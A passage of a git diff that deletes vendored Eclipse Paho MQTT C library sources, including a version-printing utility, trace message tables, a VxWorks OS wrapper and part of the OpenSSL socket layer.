- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#include <stdio.h>
-
-#if !defined(_WRS_KERNEL)
-
-#include <stdlib.h>
-#include <string.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <sys/types.h>
-#include <ctype.h>
-#include "MQTTAsync.h"
-
-#if defined(WIN32) || defined(WIN64)
-#include <windows.h>
-#include <tchar.h>
-#include <io.h>
-#include <sys/stat.h>
-#else
-#include <dlfcn.h>
-#include <sys/mman.h>
-#include <unistd.h>
-#endif
-
-
-/**
- *
- * @file
- * \brief MQTTVersion - display the version and build information strings for a library.
- *
- * With no arguments, we try to load and call the version string for the libraries we 
- * know about: mqttv3c, mqttv3cs, mqttv3a, mqttv3as.
- * With an argument:
- *   1) we try to load the named library, call getVersionInfo and display those values. 
- *   2) If that doesn't work, we look through the binary for eyecatchers, and display those.  
- *      This will work if the library is not executable in the current environment.
- *
- * */
- 
- 
- static const char* libraries[] = {"paho-mqtt3c", "paho-mqtt3cs", "paho-mqtt3a", "paho-mqtt3as"};
- static const char* eyecatchers[] = {"MQTTAsyncV3_Version", "MQTTAsyncV3_Timestamp",
- 					 "MQTTClientV3_Version", "MQTTClientV3_Timestamp"};
- 
-
-char* FindString(char* filename, const char* eyecatcher_input);
-int printVersionInfo(MQTTAsync_nameValue* info);
-int loadandcall(char* libname);
-void printEyecatchers(char* filename);
-
-
-/**
- * Finds an eyecatcher in a binary file and returns the following value.
- * @param filename the name of the file
- * @param eyecatcher_input the eyecatcher string to look for
- * @return the value found - "" if not found 
- */
-char* FindString(char* filename, const char* eyecatcher_input)
-{
-	FILE* infile = NULL;
-	static char value[100];
-	const char* eyecatcher = eyecatcher_input;
-	
-	memset(value, 0, 100);
-	if ((infile = fopen(filename, "rb")) != NULL)
-	{
-		size_t buflen = strlen(eyecatcher);
-		char* buffer = (char*) malloc(buflen);
-
-		if (buffer != NULL)
-		{
-			int c = fgetc(infile);
-
-			while (feof(infile) == 0)
-			{
-				int count = 0;
-				buffer[count++] = c;
-				if (memcmp(eyecatcher, buffer, buflen) == 0)
-				{
-					char* ptr = value;
-					c = fgetc(infile); /* skip space */
-					c = fgetc(infile);
-					while (isprint(c))
-					{
-						*ptr++ = c;
-						c = fgetc(infile);
-					}
-					break;
-				}
-				if (count == buflen)
-				{
-					memmove(buffer, &buffer[1], buflen - 1);
-					count--;
-				}
-				c = fgetc(infile);
-			}
-			free(buffer);
-		}
-
-		fclose(infile);
-	}
-	return value;
-}
-
-
-int printVersionInfo(MQTTAsync_nameValue* info)
-{
-	int rc = 0;
-	
-	while (info->name)
-	{
-		printf("%s: %s\n", info->name, info->value);
-		info++;
-		rc = 1;  /* at least one value printed */
-	}
-	return rc;
-}
-
-typedef MQTTAsync_nameValue* (*func_type)(void);
-
-int loadandcall(char* libname)
-{
-	int rc = 0;
-	MQTTAsync_nameValue* (*func_address)(void) = NULL;
-#if defined(WIN32) || defined(WIN64)
-	wchar_t wlibname[30];
-	HMODULE APILibrary;
-
-	mbstowcs(wlibname, libname, strlen(libname) + 1);
-	if ((APILibrary = LoadLibrary(wlibname)) == NULL)
-		printf("Error loading library %s, error code %d\n", libname, GetLastError());
-	else
-	{
-		func_address = (func_type)GetProcAddress(APILibrary, "MQTTAsync_getVersionInfo");
-		if (func_address == NULL) 
-			func_address = (func_type)GetProcAddress(APILibrary, "MQTTClient_getVersionInfo");
-		if (func_address)
-			rc = printVersionInfo((*func_address)());
-		FreeLibrary(APILibrary);
-	}
-#else
-	void* APILibrary = dlopen(libname, RTLD_LAZY); /* Open the Library in question */
-	char* ErrorOutput = dlerror(); 	               /* Check it opened properly */
-	if (ErrorOutput != NULL)
-		printf("Error loading library %s, error %s\n", libname, ErrorOutput);
-	else
-	{	
-		*(void **) (&func_address) = dlsym(APILibrary, "MQTTAsync_getVersionInfo");
-		if (func_address == NULL)
-			func_address = dlsym(APILibrary, "MQTTClient_getVersionInfo");
-		if (func_address)
-			rc = printVersionInfo((*func_address)());
-		dlclose(APILibrary);
-	}
-#endif
-	return rc;
-}
- 
-	
-#if !defined(ARRAY_SIZE)
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-#endif
-
-void printEyecatchers(char* filename)
-{
-	int i = 0;
-	
-	for (i = 0; i < ARRAY_SIZE(eyecatchers); ++i)
-	{
-		char* value = FindString(filename, eyecatchers[i]);
-		if (value[0]) 
-			printf("%s: %s\n", eyecatchers[i], value);
-	}
-}
-
-
-int main(int argc, char** argv)
-{
-	printf("MQTTVersion: print the version strings of an MQTT client library\n"); 
-	printf("Copyright (c) 2012, 2015 IBM Corp.\n");
-	
-	if (argc == 1)
-	{
-		int i = 0;
-		char namebuf[60];
-		
-		printf("Specify a particular library name if it is not in the current directory, or not executable on this platform\n");
-		 
-		for (i = 0; i < ARRAY_SIZE(libraries); ++i)
-		{
-#if defined(WIN32) || defined(WIN64)
-			sprintf(namebuf, "%s.dll", libraries[i]);
-#else
-			sprintf(namebuf, "lib%s.so.1", libraries[i]);
-#endif
-			printf("--- Trying library %s ---\n", libraries[i]);
-			if (!loadandcall(namebuf))
-				printEyecatchers(namebuf);
-		}
-	}
-	else
-	{
-		if (!loadandcall(argv[1]))
-			printEyecatchers(argv[1]);
-	}
-
-	return 0;
-}
-#else
-int main(void)
-{
-    fprintf(stderr, "This tool is not supported on this platform yet.\n");
-    return 1;
-}
-#endif /* !defined(_WRS_KERNEL) */
diff --git a/thirdparty/paho.mqtt.c/src/Messages.c b/thirdparty/paho.mqtt.c/src/Messages.c
deleted file mode 100644
index 63bd193..0000000
--- a/thirdparty/paho.mqtt.c/src/Messages.c
+++ /dev/null
@@ -1,104 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-/**
- * @file
- * \brief Trace messages
- *
- */
-
-
-#include "Messages.h"
-#include "Log.h"
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include "Heap.h"
-
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-
-#define max_msg_len 120
-
-static const char *protocol_message_list[] =
-{
-	"%d %s -> CONNECT cleansession: %d (%d)", /* 0, was 131, 68 and 69 */
-	"%d %s <- CONNACK rc: %d", /* 1, was 132 */
-	"%d %s -> CONNACK rc: %d (%d)", /* 2, was 138 */
-	"%d %s <- PINGREQ", /* 3, was 35 */
-	"%d %s -> PINGRESP (%d)", /* 4 */
-	"%d %s <- DISCONNECT", /* 5 */
-	"%d %s <- SUBSCRIBE msgid: %d", /* 6, was 39 */
-	"%d %s -> SUBACK msgid: %d (%d)", /* 7, was 40 */
-	"%d %s <- UNSUBSCRIBE msgid: %d", /* 8, was 41 */
-	"%d %s -> UNSUBACK msgid: %d (%d)", /* 9 */
-	"%d %s -> PUBLISH msgid: %d qos: %d retained: %d (%d) payload: %.*s", /* 10, was 42 */
-	"%d %s <- PUBLISH msgid: %d qos: %d retained: %d payload: %.*s", /* 11, was 46 */
-	"%d %s -> PUBACK msgid: %d (%d)", /* 12, was 47 */
-	"%d %s -> PUBREC msgid: %d (%d)", /* 13, was 48 */
-	"%d %s <- PUBACK msgid: %d", /* 14, was 49 */
-	"%d %s <- PUBREC msgid: %d", /* 15, was 53 */
-	"%d %s -> PUBREL msgid: %d (%d)", /* 16, was 57 */
-	"%d %s <- PUBREL msgid %d", /* 17, was 58 */
-	"%d %s -> PUBCOMP msgid %d (%d)", /* 18, was 62 */
-	"%d %s <- PUBCOMP msgid:%d", /* 19, was 63 */
-	"%d %s -> PINGREQ (%d)", /* 20, was 137 */
-	"%d %s <- PINGRESP", /* 21, was 70 */
-	"%d %s -> SUBSCRIBE msgid: %d (%d)", /* 22, was 72 */
-	"%d %s <- SUBACK msgid: %d", /* 23, was 73 */
-	"%d %s <- UNSUBACK msgid: %d", /* 24, was 74 */
-	"%d %s -> UNSUBSCRIBE msgid: %d (%d)", /* 25, was 106 */
-	"%d %s <- CONNECT", /* 26 */
-	"%d %s -> PUBLISH qos: 0 retained: %d (%d)", /* 27 */
-	"%d %s -> DISCONNECT (%d)", /* 28 */
-	"Socket error for client identifier %s, socket %d, peer address %s; ending connection", /* 29 */
-};
-
-static const char *trace_message_list[] =
-{
-	"Failed to remove client from bstate->clients", /* 0 */
-	"Removed client %s from bstate->clients, socket %d", /* 1 */
-	"Packet_Factory: unhandled packet type %d", /* 2 */
-	"Packet %s received from client %s for message identifier %d, but no record of that message identifier found", /* 3 */
-	"Packet %s received from client %s for message identifier %d, but message is wrong QoS, %d", /* 4 */
-	"Packet %s received from client %s for message identifier %d, but message is in wrong state", /* 5 */
-	"%s received from client %s for message id %d - removing publication", /* 6 */
-	"Trying %s again for client %s, socket %d, message identifier %d", /* 7 */
-	"", /* 8 */
-	"(%lu) %*s(%d)> %s:%d", /* 9 */
-	"(%lu) %*s(%d)< %s:%d", /* 10 */
-	"(%lu) %*s(%d)< %s:%d (%d)", /* 11 */
-	"Storing unsent QoS 0 message", /* 12 */
-};
-
-/**
- * Get a log message by its index
- * @param index the integer index
- * @param log_level the log level, used to determine which message list to use
- * @return the message format string
- */
-const char* Messages_get(int index, enum LOG_LEVELS log_level)
-{
-	const char *msg = NULL;
-
-	if (log_level == TRACE_PROTOCOL)
-		msg = (index >= 0 && index < ARRAY_SIZE(protocol_message_list)) ? protocol_message_list[index] : NULL;
-	else
-		msg = (index >= 0 && index < ARRAY_SIZE(trace_message_list)) ? trace_message_list[index] : NULL;
-	return msg;
-}
-
diff --git a/thirdparty/paho.mqtt.c/src/Messages.h b/thirdparty/paho.mqtt.c/src/Messages.h
deleted file mode 100644
index 08f292f..0000000
--- a/thirdparty/paho.mqtt.c/src/Messages.h
+++ /dev/null
@@ -1,24 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#if !defined(MESSAGES_H)
-#define MESSAGES_H
-
-#include "Log.h"
-
-const char* Messages_get(int, enum LOG_LEVELS);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/OsWrapper.c b/thirdparty/paho.mqtt.c/src/OsWrapper.c
deleted file mode 100644
index 6d2f97c..0000000
--- a/thirdparty/paho.mqtt.c/src/OsWrapper.c
+++ /dev/null
@@ -1,28 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2016, 2017 logi.cals GmbH
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Gunter Raidl - timer support for VxWorks
- *    Rainer Poisel - reusability
- *******************************************************************************/
-
-#include "OsWrapper.h"
-
-#if defined(_WRS_KERNEL)
-void usleep(useconds_t useconds)
-{
-	struct timespec tv;
-	tv.tv_sec = useconds / 1000000;
-	tv.tv_nsec = (useconds % 1000000) * 1000;
-	nanosleep(&tv, NULL);
-}
-#endif /* defined(_WRS_KERNEL) */
diff --git a/thirdparty/paho.mqtt.c/src/OsWrapper.h b/thirdparty/paho.mqtt.c/src/OsWrapper.h
deleted file mode 100644
index f657ab1..0000000
--- a/thirdparty/paho.mqtt.c/src/OsWrapper.h
+++ /dev/null
@@ -1,42 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2016, 2017 logi.cals GmbH
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Gunter Raidl - timer support for VxWorks
- *    Rainer Poisel - reusability
- *******************************************************************************/
-
-#if !defined(OSWRAPPER_H)
-#define OSWRAPPER_H
-
-#if defined(_WRS_KERNEL)
-#include <time.h>
-
-#define lstat stat
-
-typedef unsigned long useconds_t;
-void usleep(useconds_t useconds);
-
-#define timersub(a, b, result) \
-	do \
-	{ \
-		(result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \
-		(result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \
-		if ((result)->tv_usec < 0) \
-		{ \
-			--(result)->tv_sec; \
-			(result)->tv_usec += 1000000L; \
-		} \
-	} while (0)
-#endif /* defined(_WRS_KERNEL) */
-
-#endif /* OSWRAPPER_H */
diff --git a/thirdparty/paho.mqtt.c/src/SSLSocket.c b/thirdparty/paho.mqtt.c/src/SSLSocket.c
deleted file mode 100644
index d17c8bc..0000000
--- a/thirdparty/paho.mqtt.c/src/SSLSocket.c
+++ /dev/null
@@ -1,917 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs, Allan Stockdill-Mander - initial implementation
- *    Ian Craggs - fix for bug #409702
- *    Ian Craggs - allow compilation for OpenSSL < 1.0
- *    Ian Craggs - fix for bug #453883
- *    Ian Craggs - fix for bug #480363, issue 13
- *    Ian Craggs - SNI support
- *    Ian Craggs - fix for issues #155, #160
- *******************************************************************************/
-
-/**
- * @file
- * \brief SSL  related functions
- *
- */
-
-#if defined(OPENSSL)
-
-#include "SocketBuffer.h"
-#include "MQTTClient.h"
-#include "SSLSocket.h"
-#include "Log.h"
-#include "StackTrace.h"
-#include "Socket.h"
-
-#include "Heap.h"
-
-#include <openssl/ssl.h>
-#include <openssl/err.h>
-#include <openssl/crypto.h>
-
-extern Sockets s;
-
-int SSLSocket_error(char* aString, SSL* ssl, int sock, int rc);
-char* SSL_get_verify_result_string(int rc);
-void SSL_CTX_info_callback(const SSL* ssl, int where, int ret);
-char* SSLSocket_get_version_string(int version);
-void SSL_CTX_msg_callback(
-		int write_p,
-		int version,
-		int content_type,
-		const void* buf, size_t len,
-		SSL* ssl, void* arg);
-int pem_passwd_cb(char* buf, int size, int rwflag, void* userdata);
-int SSL_create_mutex(ssl_mutex_type* mutex);
-int SSL_lock_mutex(ssl_mutex_type* mutex);
-int SSL_unlock_mutex(ssl_mutex_type* mutex);
-void SSL_destroy_mutex(ssl_mutex_type* mutex);
-#if (OPENSSL_VERSION_NUMBER >= 0x010000000)
-extern void SSLThread_id(CRYPTO_THREADID *id);
-#else
-extern unsigned long SSLThread_id(void);
-#endif
-extern void SSLLocks_callback(int mode, int n, const char *file, int line);
-int SSLSocket_createContext(networkHandles* net, MQTTClient_SSLOptions* opts);
-void SSLSocket_destroyContext(networkHandles* net);
-void SSLSocket_addPendingRead(int sock);
-
-/* 1 ~ we are responsible for initializing openssl; 0 ~ openssl init is done externally */
-static int handle_openssl_init = 1;
-static ssl_mutex_type* sslLocks = NULL;
-static ssl_mutex_type sslCoreMutex;
-
-#if defined(WIN32) || defined(WIN64)
-#define iov_len len
-#define iov_base buf
-#endif
-
-/**
- * Gets the specific error corresponding to SOCKET_ERROR
- * @param aString the function that was being used when the error occurred
- * @param sock the socket on which the error occurred
- * @return the specific TCP error code
- */
-int SSLSocket_error(char* aString, SSL* ssl, int sock, int rc)
-{
-    int error;
-
-    FUNC_ENTRY;
-    if (ssl)
-        error = SSL_get_error(ssl, rc);
-    else
-        error = ERR_get_error();
-    if (error == SSL_ERROR_WANT_READ || error == SSL_ERROR_WANT_WRITE)
-    {
-		Log(TRACE_MIN, -1, "SSLSocket error WANT_READ/WANT_WRITE");
-    }
-    else
-    {
-        static char buf[120];
-
-        if (strcmp(aString, "shutdown") != 0)
-        	Log(TRACE_MIN, -1, "SSLSocket error %s(%d) in %s for socket %d rc %d errno %d %s\n", buf, error, aString, sock, rc, errno, strerror(errno));
-         ERR_print_errors_fp(stderr);
-		if (error == SSL_ERROR_SSL || error == SSL_ERROR_SYSCALL)
-			error = SSL_FATAL;
-    }
-    FUNC_EXIT_RC(error);
-    return error;
-}
-
-static struct
-{
-	int code;
-	char* string;
-}
-X509_message_table[] =
-{
-	{ X509_V_OK, "X509_V_OK" },
-	{ X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT, "X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT" },
-	{ X509_V_ERR_UNABLE_TO_GET_CRL, "X509_V_ERR_UNABLE_TO_GET_CRL" },
-	{ X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE, "X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE" },
-	{ X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE, "X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE" },
-	{ X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY, "X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY" },
-	{ X509_V_ERR_CERT_SIGNATURE_FAILURE, "X509_V_ERR_CERT_SIGNATURE_FAILURE" },
-	{ X509_V_ERR_CRL_SIGNATURE_FAILURE, "X509_V_ERR_CRL_SIGNATURE_FAILURE" },
-	{ X509_V_ERR_CERT_NOT_YET_VALID, "X509_V_ERR_CERT_NOT_YET_VALID" },
-	{ X509_V_ERR_CERT_HAS_EXPIRED, "X509_V_ERR_CERT_HAS_EXPIRED" },
-	{ X509_V_ERR_CRL_NOT_YET_VALID, "X509_V_ERR_CRL_NOT_YET_VALID" },
-	{ X509_V_ERR_CRL_HAS_EXPIRED, "X509_V_ERR_CRL_HAS_EXPIRED" },
-	{ X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD, "X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD" },
-	{ X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD, "X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD" },
-	{ X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD, "X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD" },
-	{ X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD, "X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD" },
-	{ X509_V_ERR_OUT_OF_MEM, "X509_V_ERR_OUT_OF_MEM" },
-	{ X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT, "X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT" },
-	{ X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN, "X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN" },
-	{ X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY, "X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY" },
-	{ X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE, "X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE" },
-	{ X509_V_ERR_CERT_CHAIN_TOO_LONG, "X509_V_ERR_CERT_CHAIN_TOO_LONG" },
-	{ X509_V_ERR_CERT_REVOKED, "X509_V_ERR_CERT_REVOKED" },
-	{ X509_V_ERR_INVALID_CA, "X509_V_ERR_INVALID_CA" },
-	{ X509_V_ERR_PATH_LENGTH_EXCEEDED, "X509_V_ERR_PATH_LENGTH_EXCEEDED" },
-	{ X509_V_ERR_INVALID_PURPOSE, "X509_V_ERR_INVALID_PURPOSE" },
-	{ X509_V_ERR_CERT_UNTRUSTED, "X509_V_ERR_CERT_UNTRUSTED" },
-	{ X509_V_ERR_CERT_REJECTED, "X509_V_ERR_CERT_REJECTED" },
-	{ X509_V_ERR_SUBJECT_ISSUER_MISMATCH, "X509_V_ERR_SUBJECT_ISSUER_MISMATCH" },
-	{ X509_V_ERR_AKID_SKID_MISMATCH, "X509_V_ERR_AKID_SKID_MISMATCH" },
-	{ X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH, "X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH" },
-	{ X509_V_ERR_KEYUSAGE_NO_CERTSIGN, "X509_V_ERR_KEYUSAGE_NO_CERTSIGN" },
-	{ X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER, "X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER" },
-	{ X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION, "X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION" },
-	{ X509_V_ERR_KEYUSAGE_NO_CRL_SIGN, "X509_V_ERR_KEYUSAGE_NO_CRL_SIGN" },
-	{ X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION, "X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION" },
-	{ X509_V_ERR_INVALID_NON_CA, "X509_V_ERR_INVALID_NON_CA" },
-	{ X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED, "X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED" },
-	{ X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE, "X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE" },
-	{ X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED, "X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED" },
-	{ X509_V_ERR_INVALID_EXTENSION, "X509_V_ERR_INVALID_EXTENSION" },
-	{ X509_V_ERR_INVALID_POLICY_EXTENSION, "X509_V_ERR_INVALID_POLICY_EXTENSION" },
-	{ X509_V_ERR_NO_EXPLICIT_POLICY, "X509_V_ERR_NO_EXPLICIT_POLICY" },
-	{ X509_V_ERR_UNNESTED_RESOURCE, "X509_V_ERR_UNNESTED_RESOURCE" },
-#if defined(X509_V_ERR_DIFFERENT_CRL_SCOPE)
-	{ X509_V_ERR_DIFFERENT_CRL_SCOPE, "X509_V_ERR_DIFFERENT_CRL_SCOPE" },
-	{ X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE, "X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE" },
-	{ X509_V_ERR_PERMITTED_VIOLATION, "X509_V_ERR_PERMITTED_VIOLATION" },
-	{ X509_V_ERR_EXCLUDED_VIOLATION, "X509_V_ERR_EXCLUDED_VIOLATION" },
-	{ X509_V_ERR_SUBTREE_MINMAX, "X509_V_ERR_SUBTREE_MINMAX" },
-	{ X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE, "X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE" },
-	{ X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX, "X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX" },
-	{ X509_V_ERR_UNSUPPORTED_NAME_SYNTAX, "X509_V_ERR_UNSUPPORTED_NAME_SYNTAX" },
-#endif
-};
-
-#if !defined(ARRAY_SIZE)
-/**
- * Macro to calculate the number of entries in an array
- */
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof(a[0]))
-#endif
-
-char* SSL_get_verify_result_string(int rc)
-{
-	int i;
-	char* retstring = "undef";
-
-	for (i = 0; i < ARRAY_SIZE(X509_message_table); ++i)
-	{
-		if (X509_message_table[i].code == rc)
-		{
-			retstring = X509_message_table[i].string;
-			break;
-		}
-	}
-	return retstring;
-}
-
-
-void SSL_CTX_info_callback(const SSL* ssl, int where, int ret)
-{
-	if (where & SSL_CB_LOOP)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL state %s:%s:%s", 
-                  (where & SSL_ST_CONNECT) ? "connect" : (where & SSL_ST_ACCEPT) ? "accept" : "undef", 
-                    SSL_state_string_long(ssl), SSL_get_cipher_name(ssl));
-	}
-	else if (where & SSL_CB_EXIT)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL %s:%s",
-                  (where & SSL_ST_CONNECT) ? "connect" : (where & SSL_ST_ACCEPT) ? "accept" : "undef",
-                    SSL_state_string_long(ssl));
-	}
-	else if (where & SSL_CB_ALERT)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL alert %s:%s:%s",
-                  (where & SSL_CB_READ) ? "read" : "write", 
-                    SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-	}
-	else if (where & SSL_CB_HANDSHAKE_START)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL handshake started %s:%s:%s",
-                  (where & SSL_CB_READ) ? "read" : "write", 
-                    SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-	}
-	else if (where & SSL_CB_HANDSHAKE_DONE)
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL handshake done %s:%s:%s", 
-                  (where & SSL_CB_READ) ? "read" : "write",
-                    SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-		Log(TRACE_PROTOCOL, 1, "SSL certificate verification: %s", 
-                    SSL_get_verify_result_string(SSL_get_verify_result(ssl)));
-	}
-	else
-	{
-		Log(TRACE_PROTOCOL, 1, "SSL state %s:%s:%s", SSL_state_string_long(ssl), 
-                   SSL_alert_type_string_long(ret), SSL_alert_desc_string_long(ret));
-	}
-}
-
-
-char* SSLSocket_get_version_string(int version)
-{
-	int i;
-	static char buf[20];
-	char* retstring = NULL;
-	static struct
-	{
-		int code;
-		char* string;
-	}
-	version_string_table[] =
-	{
-		{ SSL2_VERSION, "SSL 2.0" },
-		{ SSL3_VERSION, "SSL 3.0" },
-		{ TLS1_VERSION, "TLS 1.0" },
-#if defined(TLS2_VERSION)
-		{ TLS2_VERSION, "TLS 1.1" },
-#endif
-#if defined(TLS3_VERSION)
-		{ TLS3_VERSION, "TLS 1.2" },
-#endif
-	};
-
-	for (i = 0; i < ARRAY_SIZE(version_string_table); ++i)
-	{
-		if (version_string_table[i].code == version)
-		{
-			retstring = version_string_table[i].string;
-			break;
-		}
-	}
-	
-	if (retstring == NULL)
-	{
-		sprintf(buf, "%i", version);
-		retstring = buf;
-	}
-	return retstring;
-}
-
-
-void SSL_CTX_msg_callback(int write_p, int version, int content_type, const void* buf, size_t len, 
-        SSL* ssl, void* arg)
-{  
-
-/*  
-called by the SSL/TLS library for a protocol message, the function arguments have the following meaning:
-
-write_p
-This flag is 0 when a protocol message has been received and 1 when a protocol message has been sent.
-
-version
-The protocol version according to which the protocol message is interpreted by the library. Currently, this is one of SSL2_VERSION, SSL3_VERSION and TLS1_VERSION (for SSL 2.0, SSL 3.0 and TLS 1.0, respectively).
-
-content_type
-In the case of SSL 2.0, this is always 0. In the case of SSL 3.0 or TLS 1.0, this is one of the ContentType values defined in the protocol specification (change_cipher_spec(20), alert(21), handshake(22); but never application_data(23) because the callback will only be called for protocol messages).
-
-buf, len
-buf points to a buffer containing the protocol message, which consists of len bytes. The buffer is no longer valid after the callback function has returned.
-
-ssl
-The SSL object that received or sent the message.
-
-arg
-The user-defined argument optionally defined by SSL_CTX_set_msg_callback_arg() or SSL_set_msg_callback_arg().
-
-*/
-
-	Log(TRACE_PROTOCOL, -1, "%s %s %d buflen %d", (write_p ? "sent" : "received"), 
-		SSLSocket_get_version_string(version),
-		content_type, (int)len);	
-}
-
-
-int pem_passwd_cb(char* buf, int size, int rwflag, void* userdata)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (!rwflag)
-	{
-		strncpy(buf, (char*)(userdata), size);
-		buf[size-1] = '\0';
-		rc = (int)strlen(buf);
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-int SSL_create_mutex(ssl_mutex_type* mutex)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	*mutex = CreateMutex(NULL, 0, NULL);
-#else
-	rc = pthread_mutex_init(mutex, NULL);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-int SSL_lock_mutex(ssl_mutex_type* mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points, as trace gets lock too, and it might happen quite frequently  */
-#if defined(WIN32) || defined(WIN64)
-	if (WaitForSingleObject(*mutex, INFINITE) != WAIT_FAILED)
-#else
-	if ((rc = pthread_mutex_lock(mutex)) == 0)
-#endif
-	rc = 0;
-
-	return rc;
-}
-
-int SSL_unlock_mutex(ssl_mutex_type* mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points, as trace gets lock too, and it might happen quite frequently  */
-#if defined(WIN32) || defined(WIN64)
-	if (ReleaseMutex(*mutex) != 0)
-#else
-	if ((rc = pthread_mutex_unlock(mutex)) == 0)
-#endif
